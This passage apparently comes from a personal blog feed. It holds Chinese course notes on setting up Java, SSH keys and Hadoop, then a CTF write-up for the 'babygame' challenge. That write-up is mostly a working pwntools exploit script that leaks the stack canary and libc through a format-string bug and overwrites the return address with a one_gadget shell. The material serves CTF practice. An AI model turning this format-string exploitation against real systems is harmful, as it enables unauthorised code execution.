class="line">export JRE_HOME&#x3D;$&#123;JAVA_HOME&#125;&#x2F;jre</span><br><span class="line">export CLASSPATH&#x3D;.:$&#123;JAVA_HOME&#125;&#x2F;lib&#x2F;dt.jar:$&#123;JAVA_HOME&#125;&#x2F;lib&#x2F;tools.jar</span><br><span class="line">export PATH&#x3D;$&#123;JAVA_HOME&#125;&#x2F;bin:$PATH</span><br></pre></td></tr></table></figure><h3 id="4-更新配置"><a href="#4-更新配置" class="headerlink" title="4.更新配置"></a>4.更新配置</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">source</span> ~/.bashrc</span><br></pre></td></tr></table></figure><h3 id="5-验证"><a href="#5-验证" class="headerlink" title="5.验证"></a>5.验证</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">java -version</span><br><span class="line">java version <span class="string">&quot;1.8.0_321&quot;</span></span><br><span class="line">Java(TM) SE Runtime Environment (build 1.8.0_321-b07)</span><br><span class="line">Java HotSpot(TM) 64-Bit Server VM (build 25.321-b07, mixed mode)</span><br></pre></td></tr></table></figure><p><a href="https://blog.csdn.net/lduzhenlin/article/details/113759394">参考</a></p><h2 id="安装并配置ssh免密登录"><a href="#安装并配置ssh免密登录" class="headerlink" title="安装并配置ssh免密登录"></a>安装并配置ssh免密登录</h2><h3 id="1-安装ssh"><a href="#1-安装ssh" class="headerlink" title="1.安装ssh"></a>1.安装ssh</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install openssh-server</span><br></pre></td></tr></table></figure><p>如果报错</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">The following packages have unmet dependencies:</span><br><span class="line"> openssh-server : Depends: openssh-client (= 1:7.2p2-4ubuntu2.10)</span><br><span class="line">                  Depends: openssh-sftp-server but it is not going to be installed</span><br><span class="line">                  Recommends: ssh-import-id but it is not going to be installed</span><br><span class="line">E: Unable to correct problems, you have held broken packages.</span><br></pre></td></tr></table></figure><p>先卸载，在安装</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get autoremove openssh-client openssh-server</span><br><span class="line">sudo apt-get install openssh-client openssh-server</span><br></pre></td></tr></table></figure><p><a href="https://blog.csdn.net/lyc0424/article/details/102555121">报错参考</a></p><h3 id="2-连接并设置密码"><a href="#2-连接并设置密码" class="headerlink" title="2.连接并设置密码"></a>2.连接并设置密码</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh localhost</span><br></pre></td></tr></table></figure><h3 id="3-配置免密登陆"><a href="#3-配置免密登陆" class="headerlink" title="3.配置免密登陆"></a>3.配置免密登陆</h3><p>1.在<code>~/.ssh</code>生成公私密钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t rsa</span><br></pre></td></tr></table></figure><p>一直回车就行</p><p>2.导入公钥到认证文件，更改权限</p><ul><li><p>导入本机</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat ~/.ssh/id_rsa.pub &gt;&gt; ~/.ssh/authorized_keys </span><br></pre></td></tr></table></figure></li><li><p>导入服务器（在本机配置的不需要</p><p>将公钥复制到服务器</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scp ~/.ssh/id_rsa.pub xxx@host:/home/xxx/id_rsa.pub </span><br></pre></td></tr></table></figure><p>将公钥导入到认证文件，这一步的操作在服务器上进行</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat ~/id_rsa.pub &gt;&gt; ~/.ssh/authorized_keys </span><br></pre></td></tr></table></figure><p>在服务器上更改权限</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod 700 ~/.ssh</span><br><span class="line">chmod 600 ~/.ssh/authorized_keys </span><br></pre></td></tr></table></figure></li></ul><p>测试：ssh localhost 第一次需要输入yes和密码，之后就不需要了。</p><h2 id="安装hadoop"><a href="#安装hadoop" class="headerlink" title="安装hadoop"></a>安装hadoop</h2><h3 id="1-官网下载-1"><a href="#1-官网下载-1" class="headerlink" title="1.官网下载"></a>1.官网下载</h3><p><a href="https://hadoop.apache.org/releases.html">官网地址</a></p><h3 id="2-解压-1"><a href="#2-解压-1" class="headerlink" title="2.解压"></a>2.解压</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar -zvxf hadoop-3.3.2.tar.gz</span><br></pre></td></tr></table></figure><h3 id="3-创建hadoop用户和组，并授予执行权限"><a href="#3-创建hadoop用户和组，并授予执行权限" class="headerlink" title="3.创建hadoop用户和组，并授予执行权限"></a>3.创建hadoop用户和组，并授予执行权限</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo addgroup hadoop</span><br><span class="line">sudo usermod -a -G hadoop xxx 　　<span class="comment">#将当前用户加入到hadoop组</span></span><br><span class="line">sudo vim /etc/sudoers　　<span class="comment">#将hadoop组加入到sudoer</span></span><br></pre></td></tr></table></figure><p>在 root    ALL=(ALL:ALL) ALL 下写上 hadoop ALL=(ALL:ALL) ALL</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># User privilege specification</span><br><span class="line">rootALL&#x3D;(ALL:ALL) ALL</span><br><span class="line">hadoop ALL&#x3D;(ALL:ALL) ALL</span><br></pre></td></tr></table></figure><h3 id="4-更改权限"><a href="#4-更改权限" class="headerlink" title="4.更改权限"></a>4.更改权限</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo chmod -R 755 &#x2F;home&#x2F;trick&#x2F;hadoop-3.3.2</span><br><span class="line">sudo chown -R trick:hadoop &#x2F;home&#x2F;trick&#x2F;hadoop-3.3.2</span><br></pre></td></tr></table></figure><h3 id="5-改配置文件"><a href="#5-改配置文件" class="headerlink" title="5.改配置文件"></a>5.改配置文件</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim ~/.bashrc</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">export HADOOP_HOME&#x3D;&#x2F;home&#x2F;trick&#x2F;hadoop-3.3.2</span><br><span class="line">export PATH&#x3D;.:$&#123;JAVA_HOME&#125;&#x2F;bin:$&#123;HADOOP_HOME&#125;&#x2F;bin:$PATH</span><br></pre></td></tr></table></figure><p>配置生效</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">source</span> ~/.bashrc</span><br></pre></td></tr></table></figure><h3 id="6-检查是否生效"><a href="#6-检查是否生效" class="headerlink" title="6.检查是否生效"></a>6.检查是否生效</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ hadoop version</span><br><span class="line">Hadoop 3.3.2</span><br><span class="line">Source code repository git@github.com:apache/hadoop.git -r 0bcb014209e219273cb6fd4152df7df713cbac61</span><br><span class="line">Compiled by chao on 2022-02-21T18:39Z</span><br><span class="line">Compiled with protoc 3.7.1</span><br><span class="line">From <span class="built_in">source</span> with checksum 4b40fff8bb27201ba07b6fa5651217fb</span><br><span class="line">This <span class="built_in">command</span> was run using /home/trick/hadoop-3.3.2/share/hadoop/common/hadoop-common-3.3.2.jar</span><br></pre></td></tr></table></figure><h2 id="hadoop伪分布式配置"><a href="#hadoop伪分布式配置" class="headerlink" title="hadoop伪分布式配置"></a>hadoop伪分布式配置</h2><h3 id="1-修改core-site-xml文件"><a href="#1-修改core-site-xml文件" class="headerlink" title="1.修改core-site.xml文件"></a>1.修改core-site.xml文件</h3><p>~/hadoop-3.3.2/etc/hadoop 目录下 core-site.xml 文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim core-site.xml</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;configuration&gt;</span><br><span class="line">        &lt;property&gt;</span><br><span class="line">             &lt;name&gt;hadoop.tmp.dir&lt;&#x2F;name&gt;</span><br><span class="line">             &lt;value&gt;file:&#x2F;home&#x2F;trick&#x2F;hadoop-3.3.2&#x2F;tmp&lt;&#x2F;value&gt;</span><br><span class="line">             &lt;description&gt;Abase for other temporary directories.&lt;&#x2F;description&gt;</span><br><span class="line">        &lt;&#x2F;property&gt;</span><br><span class="line">        &lt;property&gt;</span><br><span class="line">             &lt;name&gt;fs.defaultFS&lt;&#x2F;name&gt;</span><br><span class="line">             &lt;value&gt;hdfs:&#x2F;&#x2F;localhost:9000&lt;&#x2F;value&gt;</span><br><span class="line">        &lt;&#x2F;property&gt;</span><br><span class="line">&lt;&#x2F;configuration&gt;</span><br></pre></td></tr></table></figure><h3 id="2-修改hdfs-site-xml文件"><a href="#2-修改hdfs-site-xml文件" class="headerlink" title="2.修改hdfs-site.xml文件"></a>2.修改hdfs-site.xml文件</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim hdfs-site.xml</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;configuration&gt;</span><br><span class="line">        &lt;property&gt;</span><br><span class="line">             &lt;name&gt;dfs.replication&lt;&#x2F;name&gt;</span><br><span class="line">             &lt;value&gt;1&lt;&#x2F;value&gt;</span><br><span class="line">        &lt;&#x2F;property&gt;</span><br><span class="line">        &lt;property&gt;</span><br><span class="line">             &lt;name&gt;dfs.namenode.name.dir&lt;&#x2F;name&gt;</span><br><span class="line">             &lt;value&gt;file:&#x2F;home&#x2F;trick&#x2F;hadoop-3.3.2&#x2F;tmp&#x2F;dfs&#x2F;name&lt;&#x2F;value&gt;</span><br><span class="line">        &lt;&#x2F;property&gt;</span><br><span class="line">        &lt;property&gt;</span><br><span class="line">             &lt;name&gt;dfs.datanode.data.dir&lt;&#x2F;name&gt;</span><br><span class="line">             &lt;value&gt;file:&#x2F;home&#x2F;trick&#x2F;hadoop-3.3.2&#x2F;tmp&#x2F;dfs&#x2F;data&lt;&#x2F;value&gt;</span><br><span class="line">        &lt;&#x2F;property&gt;</span><br><span class="line">&lt;&#x2F;configuration&gt;</span><br></pre></td></tr></table></figure><h3 id="3-格式化名称节点"><a href="#3-格式化名称节点" class="headerlink" title="3.格式化名称节点"></a>3.格式化名称节点</h3><p><code>/home/trick/hadoop-3.3.2</code> 目录下</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./bin/hdfs namenode -format</span><br></pre></td></tr></table></figure><p><img src="/article/%E5%AD%A6%E6%A0%A1%E8%AF%BE%E7%A8%8B%E4%B9%8B%E4%BA%91%E8%AE%A1%E7%AE%97/image-20220321172914242.png" alt="image-20220321172914242"></p><p>成功</p><h3 id="4-开启HDFS"><a href="#4-开启HDFS" class="headerlink" title="4.开启HDFS"></a>4.开启HDFS</h3><p>在hadoop-3.3.2目录下</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./sbin/start-dfs.sh</span><br></pre></td></tr></table></figure><h3 id="报错"><a href="#报错" class="headerlink" title="报错"></a>报错</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">localhost: ERROR: JAVA_HOME is not set and could not be found.</span><br></pre></td></tr></table></figure><p>在 <code>/home/trick/hadoop-3.3.2/etc/hadoop</code> 目录下修改<code>hadoop-env.sh</code>文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim etc/hadoop/hadoop-env.sh</span><br></pre></td></tr></table></figure><p>在54行找到了，以下是最终效果</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># The java implementation to use. By default, this environment</span><br><span class="line"># variable is REQUIRED on ALL platforms except OS X!</span><br><span class="line"># export JAVA_HOME&#x3D;</span><br><span class="line"></span><br><span class="line">export JAVA_HOME&#x3D;&#x2F;home&#x2F;trick&#x2F;jdk1.8.0_321</span><br></pre></td></tr></table></figure><p>再次运行，成功</p><p><img src="/article/%E5%AD%A6%E6%A0%A1%E8%AF%BE%E7%A8%8B%E4%B9%8B%E4%BA%91%E8%AE%A1%E7%AE%97/image-20220321174733366.png" alt="image-20220321174733366"></p><h2 id="HDFS基本操作"><a href="#HDFS基本操作" class="headerlink" title="HDFS基本操作"></a>HDFS基本操作</h2><h3 id="创建文件夹"><a href="#创建文件夹" class="headerlink" title="创建文件夹"></a>创建文件夹</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hdfs dfs -mkdir /<span class="built_in">test</span></span><br><span class="line">hdfs dfs -mkdir /2022_3_21_Trick</span><br></pre></td></tr></table></figure><h3 id="创建新的空文件"><a href="#创建新的空文件" class="headerlink" title="创建新的空文件"></a>创建新的空文件</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hdfs dfs -touchz /aa.txt</span><br></pre></td></tr></table></figure><h3 id="查询命令"><a href="#查询命令" class="headerlink" title="查询命令"></a>查询命令</h3><p>hdfs dfs -ls /  查询/目录下的所有文件和文件夹</p><p>hdfs dfs -ls -R 以递归的方式查询/目录下的所有文件</p><p><img src="/article/%E5%AD%A6%E6%A0%A1%E8%AF%BE%E7%A8%8B%E4%B9%8B%E4%BA%91%E8%AE%A1%E7%AE%97/image-20220321180217056.png" alt="image-20220321180217056"></p><p><a href="https://www.cnblogs.com/tanrong/p/10645467.html">hadoop参考</a></p><p><a href="https://blog.csdn.net/qq_35571554/article/details/83216710">HDFS基本命令</a></p><h1 id="Java编程"><a href="#Java编程" class="headerlink" title="Java编程"></a>Java编程</h1><h2 id="下载IDEA并解压"><a href="#下载IDEA并解压" class="headerlink" title="下载IDEA并解压"></a>下载IDEA并解压</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar -zvxf ideaIU-2021.3.3.tar.gz</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">学校课程之云计算</summary>
    
    
    
    <category term="笔记" scheme="https://trick.ink/categories/%E7%AC%94%E8%AE%B0/"/>
    
    
    <category term="云计算" scheme="https://trick.ink/tags/%E4%BA%91%E8%AE%A1%E7%AE%97/"/>
    
  </entry>
  
  <entry>
    <title>虎符2022</title>
    <link href="https://trick.ink/article/%E8%99%8E%E7%AC%A62022/"/>
    <id>https://trick.ink/article/%E8%99%8E%E7%AC%A62022/</id>
    <published>2022-03-19T05:47:48.000Z</published>
    <updated>2023-02-09T18:03:32.619Z</updated>
    
    <content type="html"><![CDATA[<h1 id="虎符2022"><a href="#虎符2022" class="headerlink" title="虎符2022"></a>虎符2022</h1><!-- 文章页 配置 --><h1 id="babygame"><a href="#babygame" class="headerlink" title="babygame"></a>babygame</h1><blockquote><p>tag: fmt</p></blockquote><p>fmt，利用方式太多了</p><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;babygame&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">25323</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">num = [<span class="number">1</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">2</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p,&#x27;b *$rebase(0x14F1)&#x27;)</span></span><br><span class="line">gdb.attach(p,<span class="string">&#x27;b *$rebase(0x000000000001449)&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">&#x27;your name:\n&#x27;</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x109</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x108</span>)</span><br><span class="line">canary = u64(p.recv(<span class="number">8</span>))-<span class="number">0x61</span></span><br><span class="line">stack_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">    <span class="keyword">if</span>(num[i] == <span class="number">0</span>):</span><br><span class="line">        p.sendlineafter(<span class="string">&#x27;: \n&#x27;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    <span class="keyword">elif</span>(num[i] == <span class="number">1</span>):</span><br><span class="line">        p.sendlineafter(<span class="string">&#x27;: \n&#x27;</span>,<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    <span class="keyword">elif</span>(num[i] == <span class="number">2</span>):</span><br><span class="line">        p.sendlineafter(<span class="string">&#x27;: \n&#x27;</span>,<span class="string">&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">log.success(<span class="string">&#x27;stack_addr: &#x27;</span>+<span class="built_in">hex</span>(stack_addr))</span><br><span class="line">log.success(<span class="string">&#x27;canary: &#x27;</span>+<span class="built_in">hex</span>(canary))</span><br><span class="line"></span><br><span class="line"><span class="comment"># # offset = 6</span></span><br><span class="line"><span class="comment"># # fmt = 0x3E = 62</span></span><br><span class="line">ret_addr = stack_addr - <span class="number">0x218</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;%62c&#x27;</span> + <span class="string">&#x27;%8$hhn&#x27;</span> + <span class="string">&#x27;a%27$p&#x27;</span> + p64(ret_addr)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;you.&#x27;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">libc_base = <span class="built_in">int</span>(p.recv(<span class="number">14</span>), <span class="number">16</span>) - libc.sym[<span class="string">&#x27;atoi&#x27;</span>] - <span class="number">20</span></span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0xe3b2e execve(&quot;/bin/sh&quot;, r15, r12)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string">  [r12] == NULL || r12 == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe3b31 execve(&quot;/bin/sh&quot;, r15, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string">  [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe3b34 execve(&quot;/bin/sh&quot;, rsi, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsi] == NULL || rsi == NULL</span></span><br><span class="line"><span class="string">  [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + <span class="number">0xe3b31</span></span><br><span class="line">one1 = one_gadget&amp;<span class="number">0xff</span></span><br><span class="line">one2 = (one_gadget&amp;<span class="number">0xff00</span>)&gt;&gt;<span class="number">8</span></span><br><span class="line">one3 = (one_gadget&amp;<span class="number">0xff0000</span>)&gt;&gt;<span class="number">16</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(one1),<span class="built_in">hex</span>(one2),<span class="built_in">hex</span>(one3))</span><br><span class="line">main_ret = ret_addr + <span class="number">0x130</span></span><br><span class="line">canary_addr = stack_addr - <span class="number">0x108</span></span><br><span class="line">log.success(<span class="string">&#x27;one_gadget: &#x27;</span> + <span class="built_in">hex</span>(one_gadget))</span><br><span class="line">log.success(<span class="string">&#x27;canary_addr: &#x27;</span> + <span class="built_in">hex</span>(canary_addr))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;%14$hhn%&#123;&#125;c%15$hhn%&#123;&#125;c%16$hhn%&#123;&#125;c%17$hhn&quot;</span>.<span class="built_in">format</span>(one1,(<span class="number">0x100</span>-one1+one2),(<span class="number">0x100</span>-one2+one3)).ljust(<span class="number">0x40</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x40</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">payload += p64(canary_addr) + p64(main_ret) + p64(main_ret+<span class="number">1</span>) + p64(main_ret+<span class="number">2</span>)</span><br><span class="line">p.sendafter(<span class="string">&#x27;you.&#x27;</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">虎符2022</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
    <category term="fmt" scheme="https://trick.ink/tags/fmt/"/>
    
  </entry>
  
  <entry>
    <title>house of storm</title>
    <link href="https://trick.ink/article/house%20of%20storm/"/>
    <id>https://trick.ink/article/house%20of%20storm/</id>
    <published>2022-03-18T06:45:39.000Z</published>
    <updated>2023-02-09T17:56:51.827Z</updated>
    
